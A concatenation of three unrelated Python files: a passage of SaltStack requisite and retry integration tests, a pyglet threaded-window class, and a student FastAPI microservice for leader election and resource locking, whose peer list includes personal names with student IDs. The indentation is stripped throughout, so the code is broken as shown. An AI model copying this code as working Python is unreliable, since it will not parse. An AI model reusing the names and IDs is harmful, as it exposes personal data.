state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.listen_names',
timeout=self.TIMEOUT)
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
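# Hedged sketch (illustrative only, not the actual retry_custom fixture) of an
# SLS state using the retry option exercised by these tests:
#
#   file_test:
#     file.exists:
#       - name: /path/to/a/non-existent/file.txt
#       - retry:
#           attempts: 5
#           interval: 10
#
# With 5 attempts at a 10 second interval the failing state keeps retrying for
# at least interval * (attempts - 1) = 40 seconds, which is what the duration
# assertion above checks against.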
def test_retry_option_success(self):
'''
test a state with the retry option that should return True immediately (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
@flaky
def test_retry_option_eventual_success(self):
'''
test a state with the retry option that should return True after at least 4 retry attempts
but never run 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, which used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_issue_46762_prereqs_on_a_state_with_unfulfilled_requirements(self):
'''
This tests the case where state C requires state A, which fails.
State C is a pre-required state for State B.
Since state A fails, state C will not run because the requisite failed,
therefore state B will not run because state C failed to run.
See https://github.com/saltstack/salt/issues/46762 for
more information.
'''
state_run = self.run_function(
'state.sls',
mods='issue-46762'
)
state_id = 'test_|-a_|-a_|-fail_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Failure!')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-b_|-b_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.c')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-c_|-c_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.a')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
filename = os.path.join(TMP, 'nonbase_env')
try:
ret = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
ret = ret[next(iter(ret))]
assert ret['result']
assert ret['comment'] == 'File {0} updated'.format(filename)
assert os.path.isfile(filename)
finally:
try:
os.remove(filename)
except OSError:
pass
@skipIf(sys.platform.startswith('win'), 'Skipped until parallel states can be fixed on Windows')
@skipIf(salt.utils.platform.is_darwin() and six.PY2, 'This test hangs on OS X on Py2')
def test_parallel_state_with_long_tag(self):
'''
This tests the case where the state being executed has a long ID dec or
name and states are being run in parallel. The filenames used for the
parallel state cache were previously based on the tag for each chunk,
and longer ID decs or name params can cause the cache file to be longer
than the operating system's max file name length. To counter this we
instead generate a SHA1 hash of the chunk's tag to use as the cache
filename. This test will ensure that long tags don't cause caching
failures.
See https://github.com/saltstack/salt/issues/49738 for more info.
'''
short_command = 'helloworld'
long_command = short_command * 25
ret = self.run_function(
'state.sls',
mods='issue-49738',
pillar={'short_command': short_command,
'long_command': long_command}
)
comments = sorted([x['comment'] for x in six.itervalues(ret)])
expected = sorted(['Command "{0}" run'.format(x)
for x in (short_command, long_command)])
assert comments == expected, '{0} != {1}'.format(comments, expected)
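# Illustrative sketch (assumed, not Salt's exact implementation) of the hashing
# described in the docstring above: a SHA1 digest of the chunk tag gives a
# fixed-length cache filename no matter how long the ID dec or name is.
#
#   import hashlib
#   tag = 'cmd_|-{0}_|-{0}_|-run'.format('helloworld' * 25)
#   cache_fn = hashlib.sha1(tag.encode('utf-8')).hexdigest() + '.p'
#   # always 40 hex characters plus '.p', well under any OS filename limit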
def _add_runtime_pillar(self, pillar):
'''
helper method to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed\nNote: No changes made, actual changes may\nbe different due to other states.'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {'newfile': testfile})
def test_state_sls_id_test_state_test_post_run(self):
'''
test state.sls_id when test is set to
true post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed\nNote: No changes made, actual changes may\nbe different due to other states.'.format(file_name))
self.assertEqual(val['changes'], {'newfile': file_name})
def test_state_sls_id_test_true_post_run(self):
'''
test state.sls_id when test is set to true as an
arg post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
def test_issue_30161_unless_and_onlyif_together(self):
'''
test cmd.run using multiple unless options where the first cmd in the
list will pass, but the second will fail. This tests the fix for issue
#35384. (The fix is in PR #35545.)
'''
sls = self.run_function('state.sls', mods='issue-30161')
self.assertSaltTrueReturn(sls)
# We must assert against the comment here to make sure the comment reads that the
# command "echo "hello"" was run. This ensures that we made it to the last unless
# command in the state. If the comment reads "unless condition is true", or similar,
# then the unless state run bailed out after the first unless command succeeded,
# which is the bug we're regression testing for.
_expected = {'file_|-unless_false_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is false',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_false_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'Empty file',
'pchanges': {},
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:20.341753',
'result': True,
'changes': {'new': 'file {0}{1}test.txt created'.format(TMP, os.path.sep)}},
'file_|-unless_true_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:22.936446',
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_true_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is true\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True}}
for id in _expected:
self.assertEqual(sls[id]['comment'], _expected[id]['comment'])
@skipIf(six.PY3 and salt.utils.platform.is_darwin(), 'Test is broken on macosx and PY3')
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
@skipIf(six.PY3 and salt.utils.platform.is_darwin(), 'Test is broken on macosx and PY3')
def test_state_sls_unicode_characters_cmd_output(self):
'''
test the output from running and echo command with non-ascii
characters.
'''
ret = self.run_function('state.sls', ['issue-46672-a'])
key = list(ret.keys())[0]
log.debug('== ret %s ==', type(ret))
_expected = 'This is Æ test!'
if salt.utils.platform.is_windows():
# Windows cmd.exe will mangle the output using cmd's codepage.
if six.PY2:
_expected = "'This is A+ test!'"
else:
_expected = "'This is ’ test!'"
self.assertEqual(_expected, ret[key]['changes']['stdout'])
def tearDown(self):
rm_files = [os.path.join(TMP, 'nonbase_env'),
os.path.join(TMP, 'testfile'),
os.path.join(TMP, 'test.txt'),
os.path.join(TMP_STATE_TREE, 'top.sls')]
for file_ in rm_files:
if os.path.isfile(file_):
os.remove(file_)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_integer_name(self):
'''
This tests the case where the state file is named
only with integers
'''
state_run = self.run_function(
'state.sls',
mods='12345'
)
state_id = 'test_|-always-passes_|-always-passes_|-succeed_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Success!')
self.assertTrue(state_run[state_id]['result'])
|
managed_window.py
|
from pyglet.gl import *
from pyglet.window import Window
from pyglet.clock import Clock
from threading import Thread, Lock
gl_lock = Lock()
class ManagedWindow(Window):
"""
A pyglet window with an event loop which executes automatically
in a separate thread. Behavior is added by creating a subclass
which overrides setup, update, and/or draw.
"""
fps_limit = 30
default_win_args = dict(width=600,
height=500,
vsync=False,
resizable=True)
def __init__(self, **win_args):
"""
It is best not to override this function in the child
class, unless you need to take additional arguments.
Do any OpenGL initialization calls in setup().
"""
# check if this is run from the doctester
if win_args.get('runfromdoctester', False):
return
self.win_args = dict(self.default_win_args, **win_args)
self.Thread = Thread(target=self.__event_loop__)
self.Thread.start()
def __event_loop__(self, **win_args):
"""
The event loop thread function. Do not override or call
directly (it is called by __init__).
"""
gl_lock.acquire()
try:
try:
super(ManagedWindow, self).__init__(**self.win_args)
self.switch_to()
self.setup()
except Exception as e:
print("Window initialization failed: %s" % str(e))
self.has_exit = True
finally:
gl_lock.release()
clock = Clock()
clock.set_fps_limit(self.fps_limit)
while not self.has_exit:
dt = clock.tick()
gl_lock.acquire()
try:
try:
self.switch_to()
self.dispatch_events()
self.clear()
self.update(dt)
self.draw()
self.flip()
except Exception as e:
print("Uncaught exception in event loop: %s" % str(e))
self.has_exit = True
finally:
gl_lock.release()
super(ManagedWindow, self).close()
def close(self):
"""
Closes the window.
"""
self.has_exit = True
def setup(self):
"""
Called once before the event loop begins.
Override this method in a child class. This
is the best place to put things like OpenGL
initialization calls.
"""
pass
def update(self, dt):
"""
Called before draw during each iteration of
the event loop. dt is the elapsed time in
seconds since the last update. OpenGL rendering
calls are best put in draw() rather than here.
"""
pass
def draw(self):
"""
Called after update during each iteration of
the event loop. Put OpenGL rendering calls
here.
"""
pass
if __name__ == '__main__':
ManagedWindow()
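# Usage sketch (not part of the original module; the GL calls and rotation
# speed are illustrative assumptions): behaviour is added by subclassing
# ManagedWindow and overriding setup, update and draw.
class ExampleSpinnerWindow(ManagedWindow):
    def setup(self):
        glClearColor(0.0, 0.0, 0.0, 1.0)  # one-time GL state: black background
        self.angle = 0.0

    def update(self, dt):
        self.angle += 90.0 * dt  # rotate 90 degrees per second of wall time

    def draw(self):
        glLoadIdentity()
        glRotatef(self.angle, 0.0, 0.0, 1.0)
        glBegin(GL_TRIANGLES)
        glVertex2f(0.0, 0.5)
        glVertex2f(-0.5, -0.5)
        glVertex2f(0.5, -0.5)
        glEnd()

# ExampleSpinnerWindow()  # would open the window and start its event loop thread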
|
main.py
|
import functools
import os
import random
import threading
import time
from dataclasses import dataclass
from datetime import datetime, timedelta
from enum import Enum
from typing import Dict, Iterator, Optional
from uuid import UUID, uuid4
import requests
from fastapi import FastAPI, HTTPException
from fastapi.exception_handlers import request_validation_exception_handler
from fastapi.exceptions import RequestValidationError
from pydantic import BaseModel
from uvicorn import Config, Server
import asyncio
from contextlib import suppress
PORT = int(os.getenv("PORT", "8000"))
app = FastAPI()
class ResolverBody(BaseModel):
operacao: str
arguments: Dict[str, str]
@dataclass
class RecursoBody:
codigo_de_acesso: str
_uuid: Optional[UUID] = None
valor: Optional[int] = None
validade: Optional[datetime] = None
# constructor
def __init__(self, codigo_de_acesso: UUID, valor: int, validade: datetime) -> None:
self._uuid = codigo_de_acesso
self.valor = valor
self.validade = validade
EXPIRACAO = 5
@dataclass
class InfoBody:
server_name: str
server_endpoint: str
descricao: str
versao: float
status: str
tipo_de_eleicao_ativa: str
def __init__(self) -> None:
self.server_name = "sd_microservice"
self.server_endpoint = "https://pratica-sd.herokuapp.com/"
self.descricao = "Projeto de SD. Os seguintes serviços estão implementados. GET: [/, /info, /peers, /peers/{id}, /fruits, /clients]. POST: [/resolver, /peers, /echo]. PUT: [/info, /peers/{id}]. DELETE: [/peer/{id}]"
self.versao = 0.1
self.status = "online"
self.tipo_de_eleicao_ativa = "anel"
def get_atts(self):
return [
self.server_name,
self.server_endpoint,
self.descricao,
self.versao,
self.status,
self.tipo_de_eleicao_ativa,
]
@dataclass
class Valid(Enum):
VALID = 0b00
INVALID = 0b01
DUPLICATE = 0b10
class EleicaoBody(BaseModel):
id: str
dados: Optional[list[str]] = None
@dataclass
class CoordenadorBody:
coordenador: str
id_eleicao: str
recursos: dict[UUID, RecursoBody] = {}
glInfo = InfoBody()
glPeers = [
# {
# "id": "201810665",
# "nome": "Jenilson Ramos Santos",
# "url": "https://jenilsonramos-sd-20211.herokuapp.com/",
# },
# {
# "id": "201720308",
# "nome": "Victor Dos Santos Santana",
# "url": "https://sd-victor-20212.herokuapp.com/",
# },
{
"id": "201720295",
"nome": "Allana Dos Santos Campos",
"url": "https://sd-ascampos-20212.herokuapp.com/",
},
{
"id": "201710396",
"nome": "Robert Morais Santos Broketa",
"url": "https://pratica-sd.herokuapp.com/",
},
{
"id": "201710377",
"nome": "Hiago Rios Cordeiro",
"url": "https://sd-api-uesc.herokuapp.com/",
},
{
"id": "201710376",
"nome": "Guilherme Senna Cruz",
"url": "https://nodejs-sd-guilhermesenna.herokuapp.com/",
},
# {
# "id": "201710375",
# "nome": "Emmanuel Norberto Ribeiro Dos Santos",
# "url": "https://sd-emmanuel.herokuapp.com/",
# },
# {
# "id": "201620400",
# "nome": "Nassim Maron Rihan",
# "url": "https://sd-nassimrihan-2021-2.herokuapp.com/",
# },
# {
# "id": "201610337",
# "nome": "Luís Carlos Santos Câmara",
# "url": "https://sd-20212-luiscarlos.herokuapp.com/",
# },
# {
# "id": "201610327",
# "nome": "João Pedro De Gois Pinto",
# "url": "https://sd-joaopedrop-20212.herokuapp.com/",
# },
# {
# "id": "201512136",
# "nome": "Annya Rita De Souza Ourives",
# "url": "https://sd-annyaourives-20212.herokuapp.com/hello/",
# },
]
myUrl = "https://pratica-sd.herokuapp.com/"
myId = "201710396"
coordenador = {
"coordenador": False,
"coordenador_atual": "",
}
id_eleicao_atual = ""
eleicoes: set[str] = set()
interval_check = 2.0
def is_peer_valid(peer: dict[str, str]) -> Valid:
for (k, v) in peer.items():
if k != "id" and k != "nome" and k != "url":
return Valid.INVALID
if k == "id" or k == "nome" or k == "url":
if k == "nome" and v.isdigit():
return Valid.INVALID
if k == "url" and not v.startswith("http"):
return Valid.INVALID
try:
glPeers.index(peer)
return Valid.DUPLICATE
except ValueError:
return Valid.VALID
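# Examples: a dict with exactly the keys "id", "nome" and "url" (url starting
# with "http", nome not purely digits) that is not already in glPeers returns
# Valid.VALID; posting the identical dict again returns Valid.DUPLICATE; any
# extra key, an all-digit "nome" or a non-http "url" returns Valid.INVALID.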
@app.get("/")
def index():
return {
"routes": {
"GET": {
"/": "This page",
"/fruits": "List of fruits",
"/clients": "List of Clients",
},
"POST": {
"/echo": "Echoes the passed parameter",
"/resolver": {
"body": {
"resolver": "operacao",
"nome": "name of the person to match a service url",
},
"response": {"url": "url of the service of the matched name"},
},
},
},
}
def recurso_expirou(validade: datetime) -> bool:
return datetime.now() - validade >= timedelta(seconds=EXPIRACAO)
def log(sev: str, comment: str, msg: str):
requests.post(
"https://sd-log-server.herokuapp.com/log",
json={
"from": myUrl,
"severity": sev,
"comment": comment,
"body": msg,
},
)
@app.exception_handler(RequestValidationError)
async def validation_exception_handler(request, exc: RequestValidationError):
print(f"OMG! The client sent invalid data!: {exc.body}")
return await request_validation_exception_handler(request, exc)
@app.put("/tipo_eleicao")
def update_tipo_eleicao(tipo_eleicao: str):
global glInfo
glInfo.tipo_de_eleicao_ativa = tipo_eleicao
return {"tipo_eleicao": tipo_eleicao}
@app.post("/offline/{body}")
def post_offline(body: bool = True):
global glInfo
if body:
glInfo.status = "offline"
else:
glInfo.status = "online"
return {"status": glInfo.status}
@app.get("/eleicao")
def get_eleicao():
return {
"tipo_de_eleicao_ativa": glInfo.tipo_de_eleicao_ativa,
"eleicoes_em_andamento": eleicoes,
}
@app.post("/eleicao")
def post_eleicao(body: EleicaoBody):
if glInfo.status == "offline":
raise HTTPException(status_code=404, detail="Servidor offline")
global coordenador
if glInfo.status == "online" and (
glInfo.tipo_de_eleicao_ativa == "anel" or not eleicoes.__contains__(body.id)
):
eleicoes.add(body.id)
threading.Thread(target=eleicao, args=(body.id, body.dados, True)).start()
return body.dict()
@app.post("/eleicao/coordenador")
def post_eleicao_coordenador(body: CoordenadorBody):
if glInfo.status == "offline":
raise HTTPException(status_code=404, detail="Servidor offline")
global coordenador
coordenador["coordenador_atual"] = body.coordenador
coordenador["coordenador"] = body.coordenador == myId
log(
"Success",
f"Eleicao finalizada",
f"Eleicao: {body.id_eleicao}. Novo coordenador: {body.coordenador}",
)
print(f"Eleicao {body.id_eleicao} finalizada. Novo coordenador: {body.coordenador}")
eleicoes.discard(body.id_eleicao)
@app.post("/resetar")
def resetar_coord():
global coordenador
coordenador["coordenador"] = False
coordenador["coordenador_atual"] = ""
eleicoes.clear()
return {"status": "ok"}
@app.get("/recurso")
def get_recurso(body: RecursoBody):
try:
recurso = recursos.get(UUID(body.codigo_de_acesso))
except ValueError:
raise HTTPException(status_code=401, detail="Chave inválida")
if recurso is None or recurso_expirou(recurso.validade):
raise HTTPException(
status_code=401, detail="Recurso expirado ou não encontrado"
)
return {"valor": recurso.valor}
@app.delete("/recurso")
def delete_recurso(body: RecursoBody):
recurso = recursos.get(UUID(body.codigo_de_acesso))
if recurso is None:
raise HTTPException(status_code=410, detail="Recurso não existe")
if recurso._uuid is not None:
del recursos[recurso._uuid]
if recurso_expirou(recurso.validade):
raise HTTPException(status_code=410, detail="Recurso expirado")
@app.put("/recurso")
def put_recurso(body: RecursoBody):
recurso = recursos.get(UUID(body.codigo_de_acesso))
if recurso is None or recurso_expirou(recurso.validade):
raise HTTPException(
status_code=401, detail="Recurso expirado ou não encontrado"
)
recurso.valor = body.valor
recurso.validade = datetime.now()
if recurso._uuid is not None:
recursos[recurso._uuid] = recurso
return {"codigo_de_acesso": recurso._uuid, "valor": recurso.valor}
@app.post("/recurso")
def post_recurso(body: RecursoBody = None):
if body is None:
uid = uuid4()
validade = datetime.now() + timedelta(seconds=EXPIRACAO)
recursos[uid] = RecursoBody(
codigo_de_acesso=uid,
valor=random.randint(1, 1000),
validade=validade,
)
return {"codigo_de_acesso": uid, "validade": validade}
else:
# get recurso from dict
recurso = recursos.get(UUID(body.codigo_de_acesso))
# raise exception with code 409 if recurso is not None and recurso
# validade is now plus EXPIRACAO seconds
if recurso is not None:
if recurso.validade is not None and not recurso_expirou(recurso.validade):
recurso.validade = datetime.now()
if recurso._uuid is not None:
recursos[recurso._uuid] = recurso
raise HTTPException(status_code=409, detail="Recurso em uso")
if body.valor is not None:
recurso.valor = body.valor
# update recurso validade
recurso.validade = datetime.now()
# update dict
if recurso._uuid is not None:
recursos[recurso._uuid] = recurso
return {
"codigo_de_acesso": recurso._uuid,
"validade": recurso.validade,
}
else:
uid = uuid4()
validade = datetime.now() + timedelta(seconds=EXPIRACAO)
recursos[uid] = RecursoBody(
codigo_de_acesso=uid,
valor=random.randint(1, 1000),
validade=validade,
)
return {"codigo_de_acesso": uid, "validade": validade}
@app.get("/info")
def get_info():
return glInfo
@app.put("/info")
def update_info(body: InfoBody):
if any(
not att or (isinstance(att, float) and att <= 0.0) for att in body.get_atts()
):
raise HTTPException(
status_code=400, detail="A requisição não contem os dados necessários"
)
else:
global glInfo
if glInfo.status == "offline" and body.status == "online":
# args must be a 1-tuple; args=("") would pass no arguments to eleicao
threading.Thread(target=eleicao, args=("",)).start()
glInfo = body
@app.get("/peers")
def get_peers():
return glPeers
@app.get("/peers/{id}")
def get_peer(id: str):
for d in glPeers:
if d.get("id") == id:
return d
